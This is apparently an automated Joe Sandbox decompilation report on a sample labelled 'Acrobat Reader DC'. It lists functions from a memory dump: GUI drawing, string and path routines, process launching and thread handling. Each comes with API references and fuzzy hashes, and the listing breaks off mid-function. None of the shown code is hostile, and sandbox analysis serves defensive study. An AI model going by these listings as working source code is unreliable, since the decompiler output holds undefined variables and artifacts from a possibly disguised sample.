                                  			E00430B87(struct HWND__** _a4, struct HWND__** _a8, int _a12) {
                                  				struct tagPOINT _v16;
                                  				struct tagRECT _v32;
                                  				void* _t25;
                                  				struct HWND__** _t49;
                                  
                                  				_t49 = _a4;
                                  				if(_t49[0xe] == 0) {
                                  					GetWindowRect( *_a8,  &_v32);
                                  					_v16.x = _v32.left;
                                  					_v16.y = _v32.top;
                                  					ScreenToClient( *_t49,  &_v16);
                                  					_v32.top = _v16.y;
                                  					_v16.x = _v32.right;
                                  					_v32.left = _v16.x;
                                  					_v16.y = _v32.bottom;
                                  					ScreenToClient( *_t49,  &_v16);
                                  					_v32.right = _v16.x;
                                  					_v32.bottom = _v16.y;
                                  					return InvalidateRect( *_t49,  &_v32, _a12);
                                  				}
                                  				return _t25;
                                  			}








                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ClientRectScreen$InvalidateWindow
                                  • String ID:
                                  • API String ID: 357397906-0
                                  • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                  • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                  • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                  • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00433908(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                  				char _v12;
                                  				char _v20;
                                  				char _v536;
                                  				char _v1052;
                                  				char _v1568;
                                  				char _v2084;
                                  
                                  				_t41 = __edi;
                                  				E00413A0E(_a4,  &_v20,  &_v2084,  &_v1568,  &_v536);
                                  				E00413A0E(_a8,  &_v12,  &_v1052,  &_v1568,  &_v536);
                                  				if(_v20 != 0 || _v12 != 0) {
                                  					return E004114AB(_t41,  &_v20,  &_v12) & 0xffffff00 | _t28 != 0x00000000;
                                  				} else {
                                  					return E004114AB(__edi,  &_v2084,  &_v1052) & 0xffffff00 | _t30 != 0x00000000;
                                  				}
                                  			}










                                  APIs
                                  • __wsplitpath.LIBCMT ref: 0043392E
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • __wsplitpath.LIBCMT ref: 00433950
                                  • __wcsicoll.LIBCMT ref: 00433974
                                  • __wcsicoll.LIBCMT ref: 0043398A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                  • String ID:
                                  • API String ID: 1187119602-0
                                  • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                  • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                  • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                  • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00421E33(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                  				intOrPtr _t25;
                                  				void* _t26;
                                  				void* _t29;
                                  
                                  				_t25 = _a16;
                                  				if(_t25 == 0x65 || _t25 == 0x45) {
                                  					_t26 = E00421725(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                  					goto L9;
                                  				} else {
                                  					_t35 = _t25 - 0x66;
                                  					if(_t25 != 0x66) {
                                  						__eflags = _t25 - 0x61;
                                  						if(_t25 == 0x61) {
                                  							L7:
                                  							_t26 = E0042180C(_a4, _a8, _a12, _a20, _a24, _a28);
                                  						} else {
                                  							__eflags = _t25 - 0x41;
                                  							if(__eflags == 0) {
                                  								goto L7;
                                  							} else {
                                  								_t26 = E00421D46(__ebx, _t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                  							}
                                  						}
                                  						L9:
                                  						return _t26;
                                  					} else {
                                  						return E00421C85(__ebx, _t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                  					}
                                  				}
                                  			}







                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                  • String ID:
                                  • API String ID: 3016257755-0
                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                  • Instruction ID: fa6d01852bb983edeafff486d0019367465e9530caf48e469f9bea5953271079
                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                  • Instruction Fuzzy Hash: FE11727250005DFBCF125E85EC41CEE3F22BB28394B9A8416FE1858131C73AC9B1AB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E00434963(intOrPtr _a4, intOrPtr _a8) {
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t16;
                                  				void* _t18;
                                  				void* _t27;
                                  				intOrPtr _t28;
                                  				intOrPtr _t41;
                                  				intOrPtr _t43;
                                  				intOrPtr _t46;
                                  
                                  				_t28 = _a8;
                                  				_t43 = _a4;
                                  				_t46 =  *((intOrPtr*)(_t43 + 0x10));
                                  				if(_t46 != 0) {
                                  					_t18 = E004111C1( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))));
                                  					_push( ~(_t46 > 0) | (E004111C1(_t28) + _t18 + 0x00000001) * 0x00000002);
                                  					_t41 = E004115D7(_t18, _t43,  ~(_t46 > 0) | (E004111C1(_t28) + _t18 + 0x00000001) * 0x00000002);
                                  					E00411567(_t41,  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))));
                                  					E00411536(_t41, _t28);
                                  					_push( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))));
                                  					_t27 = E004111DC();
                                  					 *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))) = _t41;
                                  					return _t27;
                                  				}
                                  				return _t16;
                                  			}













                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$_malloc_wcscat_wcscpy
                                  • String ID:
                                  • API String ID: 1597257046-0
                                  • Opcode ID: f11043ad9d67cc5c40085a46a3b7adaa57771fda566fa35e382c82f885712106
                                  • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                  • Opcode Fuzzy Hash: f11043ad9d67cc5c40085a46a3b7adaa57771fda566fa35e382c82f885712106
                                  • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004472F1(struct HDC__* _a4, int _a8, int _a12, int _a16, int _a20, signed char _a24) {
                                  				void* _t9;
                                  				struct HDC__* _t19;
                                  
                                  				_t19 = _a4;
                                  				if((_a24 & 0x00000002) != 0) {
                                  					E0044719B(_t19, 0, 0xffffffff, 2, 1);
                                  					MoveToEx(_t19, _a8, _a12, 0);
                                  					LineTo(_t19, _a16, _a20);
                                  					if( *0x4a86ec != 0) {
                                  						EndPath(_t19);
                                  						 *0x4a86ec = 0;
                                  					}
                                  					return StrokePath(_t19);
                                  				}
                                  				return _t9;
                                  			}






                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                  • LineTo.GDI32(?,?,?), ref: 00447326
                                  • EndPath.GDI32(?), ref: 00447336
                                  • StrokePath.GDI32(?), ref: 00447344
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                  • String ID:
                                  • API String ID: 2783949968-0
                                  • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                  • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                  • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                  • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00430B0F(WCHAR* _a4) {
                                  				int _t5;
                                  				void* _t8;
                                  
                                  				E00412F40(0x4a9568, 0, 0x44);
                                  				E00412F40(0x4a9554, 0, 0x10);
                                  				0x4a9568->cb = 0x44;
                                  				 *0x4a9594 = 1;
                                  				 *0x4a9598 = 1;
                                  				_t5 = CreateProcessW(0, _a4, 0, 0, 0, 0x20, 0, 0, 0x4a9568, 0x4a9554);
                                  				if(_t5 != 0) {
                                  					_t8 = 0x4a9554->hProcess; // 0x0
                                  					return CloseHandle(_t8);
                                  				}
                                  				return _t5;
                                  			}






                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$CloseCreateHandleProcess
                                  • String ID:
                                  • API String ID: 3277943733-0
                                  • Opcode ID: e088a7bf58335eb6944ed34f3b8eeab294ed842f4155ecbba55165c5b0624384
                                  • Instruction ID: 3470c143a95c0eef1b65460b57efe1f3fa5fad32f127a08d2907f48b6a67c281
                                  • Opcode Fuzzy Hash: e088a7bf58335eb6944ed34f3b8eeab294ed842f4155ecbba55165c5b0624384
                                  • Instruction Fuzzy Hash: DFF01C72BC034476F7259B59DD47F853A689719F48F20002AB7086E1E3C6F9B850D7AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 66%
                                  			E0043646A(struct HWND__* _a4, long _a8) {
                                  				long _t4;
                                  				long _t8;
                                  				struct HWND__* _t9;
                                  
                                  				_t9 = _a4;
                                  				if(_a8 != 1) {
                                  					_push(0);
                                  					L4:
                                  					_t4 = GetWindowThreadProcessId(_t9, 0);
                                  					return AttachThreadInput(GetCurrentThreadId(), _t4, ??);
                                  				}
                                  				_t8 = SendMessageTimeoutW(_t9, 0, 0, 0, 2, 0x1388,  &_a8);
                                  				if(_t8 != 0) {
                                  					_push(1);
                                  					goto L4;
                                  				}
                                  				return _t8;
                                  			}







                                  APIs
                                  • SendMessageTimeoutW.USER32 ref: 00436489
                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                  • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                  • AttachThreadInput.USER32(00000000), ref: 004364AA
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                  • String ID:
                                  • API String ID: 2710830443-0
                                  • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                  • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                  • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                  • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00436C2B(void** _a4) {
                                  				void** _t16;
                                  
                                  				_t16 = _a4;
                                  				WaitForSingleObject( *_t16, 0xffffffff);
                                  				__imp__UnloadUserProfile(_t16[2], _t16[1]);
                                  				CloseHandle(_t16[2]);
                                  				CloseHandle( *_t16);
                                  				E00436BA9(_t16);
                                  				return 0;
                                  			}





                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                  • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                    • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                    • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                  • String ID:
                                  • API String ID: 146765662-0
                                  • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                  • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                  • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                  • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041514D() {
                                  				void* _t3;
                                  				void* _t6;
                                  				void* _t8;
                                  				void* _t9;
                                  
                                  				_t9 = E004179F0(_t6, _t8);
                                  				if(_t9 != 0) {
                                  					_t3 =  *(_t9 + 4);
                                  					if(_t3 != 0xffffffff) {
                                  						CloseHandle(_t3);
                                  					}
                                  					E00417BB2(_t9);
                                  				}
                                  				ExitThread(0);
                                  			}








                                  APIs
                                  • __getptd_noexit.LIBCMT ref: 00415150
                                    • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                    • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                    • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                    • Part of subcall function 004179F0: __initptd.LIBCMT ref: 00417A3F
                                    • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                    • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                  • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                  • __freeptd.LIBCMT ref: 0041516B
                                  • ExitThread.KERNEL32 ref: 00415173
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit__initptd
                                  • String ID:
                                  • API String ID: 2246029678-0
                                  • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                  • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                  • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                  • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042F373(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
                                  				signed char* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t82;
                                  				signed int _t83;
                                  				signed char _t85;
                                  				intOrPtr _t86;
                                  				intOrPtr _t88;
                                  				signed char _t89;
                                  				void* _t93;
                                  				signed int _t94;
                                  				signed char _t96;
                                  				signed char _t97;
                                  				signed char _t98;
                                  				void* _t99;
                                  				signed char _t100;
                                  				signed char _t101;
                                  				signed int _t102;
                                  				void* _t105;
                                  				signed char _t107;
                                  				signed char _t108;
                                  				signed int _t109;
                                  				intOrPtr* _t111;
                                  				intOrPtr _t112;
                                  				intOrPtr _t113;
                                  				intOrPtr _t114;
                                  				intOrPtr _t118;
                                  				signed char _t121;
                                  				signed char _t122;
                                  				signed char _t123;
                                  				signed char* _t124;
                                  				signed char _t137;
                                  				intOrPtr _t138;
                                  				intOrPtr _t139;
                                  				signed char* _t140;
                                  				void* _t141;
                                  
                                  				_t111 = _a28;
                                  				_t140 =  *_a4;
                                  				_t82 =  *_t111;
                                  				_t113 = _t82;
                                  				_v8 = _t140;
                                  				_t138 = _a12;
                                  				_v20 = _t113;
                                  				_v12 = _t113;
                                  				_v16 = 0;
                                  				if( *_t140 != 0x28) {
                                  					L35:
                                  					_t139 = _a8;
                                  					if(_t140 >=  *((intOrPtr*)(_t139 + 0x1c))) {
                                  						goto L101;
                                  					} else {
                                  						while(1) {
                                  							_t85 =  *_t140;
                                  							_t114 = _v12;
                                  							if(_t85 != 0x5c) {
                                  								goto L45;
                                  							}
                                  							_t140 =  &(_t140[1]);
                                  							_v8 = _t140;
                                  							_t100 =  *_t140;
                                  							if(_t100 == 0) {
                                  								goto L101;
                                  							} else {
                                  								if(_t100 != 0x51) {
                                  									L96:
                                  									_t140 =  &(_t140[1]);
                                  									_v8 = _t140;
                                  									if(_t140 >=  *((intOrPtr*)(_t139 + 0x1c))) {
                                  										goto L101;
                                  									} else {
                                  										_t111 = _a28;
                                  										continue;
                                  									}
                                  								} else {
                                  									while(1) {
                                  										_t140 =  &(_t140[1]);
                                  										_v8 = _t140;
                                  										_t101 =  *_t140;
                                  										if(_t101 == 0) {
                                  											goto L101;
                                  										}
                                  										if(_t101 != 0x5c) {
                                  											continue;
                                  										} else {
                                  											if(_t101 == 0) {
                                  												goto L101;
                                  											} else {
                                  												_t140 =  &(_t140[1]);
                                  												_v8 = _t140;
                                  												if( *_t140 != 0x45) {
                                  													continue;
                                  												} else {
                                  													goto L96;
                                  												}
                                  											}
                                  										}
                                  										goto L107;
                                  									}
                                  									goto L101;
                                  								}
                                  							}
                                  							goto L107;
                                  							L45:
                                  							if(_t85 != 0x5b) {
                                  								_t125 = _a20;
                                  								if(_a20 == 0 || _t85 != 0x23) {
                                  									if(_t85 != 0x28) {
                                  										if(_t85 == 0x29) {
                                  											if(_v16 != 0 &&  *_t111 < _t114) {
                                  												 *_t111 = _t114;
                                  											}
                                  											goto L101;
                                  										} else {
                                  											if(_t85 == 0x7c && _v16 != 0) {
                                  												_t86 =  *_t111;
                                  												if(_t86 > _t114) {
                                  													_v12 = _t86;
                                  												}
                                  												 *_t111 = _v20;
                                  											}
                                  											goto L96;
                                  										}
                                  									} else {
                                  										_t88 = E0042F373( &_v8, _t139, _a12, _a16, _t125, _a24, _t111);
                                  										_t141 = _t141 + 0x1c;
                                  										if(_t88 > 0) {
                                  											goto L106;
                                  										} else {
                                  											_t140 = _v8;
                                  											if( *_t140 == 0) {
                                  												goto L101;
                                  											} else {
                                  												goto L96;
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									_t140 =  &(_t140[1]);
                                  									_v8 = _t140;
                                  									_t89 =  *_t140;
                                  									if(_t89 == 0) {
                                  										goto L101;
                                  									} else {
                                  										do {
                                  											_t117 =  *((intOrPtr*)(_t139 + 0x58));
                                  											if( *((intOrPtr*)(_t139 + 0x58)) == 0) {
                                  												_t118 =  *((intOrPtr*)(_t139 + 0x5c));
                                  												if(_t140 >  *((intOrPtr*)(_t139 + 0x1c)) - _t118 || _t89 !=  *((intOrPtr*)(_t139 + 0x60)) || _t118 != 1 && _t140[1] !=  *((intOrPtr*)(_t139 + 0x61))) {
                                  													goto L81;
                                  												} else {
                                  													goto L75;
                                  												}
                                  											} else {
                                  												_t92 =  *((intOrPtr*)(_t139 + 0x1c));
                                  												if(_t140 >=  *((intOrPtr*)(_t139 + 0x1c))) {
                                  													L81:
                                  													_t140 =  &(_t140[1]);
                                  													_v8 = _t140;
                                  													if(_a24 != 0 && ( *_t140 & 0x000000c0) == 0x80) {
                                  														do {
                                  															_t140 =  &(_t140[1]);
                                  															_v8 = _t140;
                                  														} while (( *_t140 & 0x000000c0) == 0x80);
                                  													}
                                  													goto L84;
                                  												} else {
                                  													_t53 = _t139 + 0x5c; // 0x5c
                                  													_t93 = E0042E9B5(_t140, _t117, _t92, _t53, _a24);
                                  													_t141 = _t141 + 0x14;
                                  													if(_t93 == 0) {
                                  														goto L81;
                                  													} else {
                                  														L75:
                                  														_t140 =  &(_t140[ *((intOrPtr*)(_t139 + 0x5c)) - 1]);
                                  														_v8 = _t140;
                                  														if( *_t140 == 0) {
                                  															goto L101;
                                  														} else {
                                  															goto L96;
                                  														}
                                  													}
                                  												}
                                  											}
                                  											goto L107;
                                  											L84:
                                  											_t89 =  *_t140;
                                  										} while (_t89 != 0);
                                  										_t94 = _a4;
                                  										 *_t94 = _t140;
                                  										return _t94 | 0xffffffff;
                                  									}
                                  								}
                                  							} else {
                                  								_t112 = 0;
                                  								while(1) {
                                  									L47:
                                  									_t96 = _t140[1];
